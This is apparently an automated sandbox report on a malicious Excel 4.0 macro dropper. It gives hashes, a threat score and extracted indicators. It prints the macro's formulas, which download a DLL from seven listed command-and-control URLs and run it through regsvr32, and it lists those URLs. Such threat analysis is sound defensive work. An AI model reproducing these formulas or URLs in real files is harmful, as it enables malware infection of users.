General

  • Target

    f42401dda8df773b89a952bc1c69321d4e56fb0fb41b6f0e097fc7a6748ad7b0

  • Size

    73KB

  • Sample

    241120-ahsrlawkew

  • MD5

    2f6ed08006f357d51e46590697c76a65

  • SHA1

    5ad124b762f88e8d10405719491a6c26b125fce1

  • SHA256

    f42401dda8df773b89a952bc1c69321d4e56fb0fb41b6f0e097fc7a6748ad7b0

  • SHA512

    21369a8cc4fbf3775b1fb59273fe127a6a4606a120c8137f654a7151a6612f21d805c7e610396afa8214ddf15369559e56fdf5ea1e888034b8dbeb74c9e47141

  • SSDEEP

    1536:j1iiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVzc:j1iiCtzSmICpH7OZuvZGsMU

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

https://andjello.net/wp-includes/O74XNLzsodp/

http://andrewpharma.com/wp-includes/d8yxEkWRUU/

http://anneferrier.com/logs/Ia7oz193SZbb5N/

http://anaforainc.com/media/tUKKnlCd0QJDxWO/

http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/

http://amdrolls.com/Template/goRpY/

https://www.anagramme.net/admin_files/rOzDUUhjSMh/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andjello.net/wp-includes/O74XNLzsodp/","..\ujg.dll",0,0)
    =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/d8yxEkWRUU/","..\ujg.dll",0,0))
    =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anneferrier.com/logs/Ia7oz193SZbb5N/","..\ujg.dll",0,0))
    =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anaforainc.com/media/tUKKnlCd0QJDxWO/","..\ujg.dll",0,0))
    =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/","..\ujg.dll",0,0))
    =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amdrolls.com/Template/goRpY/","..\ujg.dll",0,0))
    =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.anagramme.net/admin_files/rOzDUUhjSMh/","..\ujg.dll",0,0))
    =IF('EGDGB'!F19<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    https://andjello.net/wp-includes/O74XNLzsodp/

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks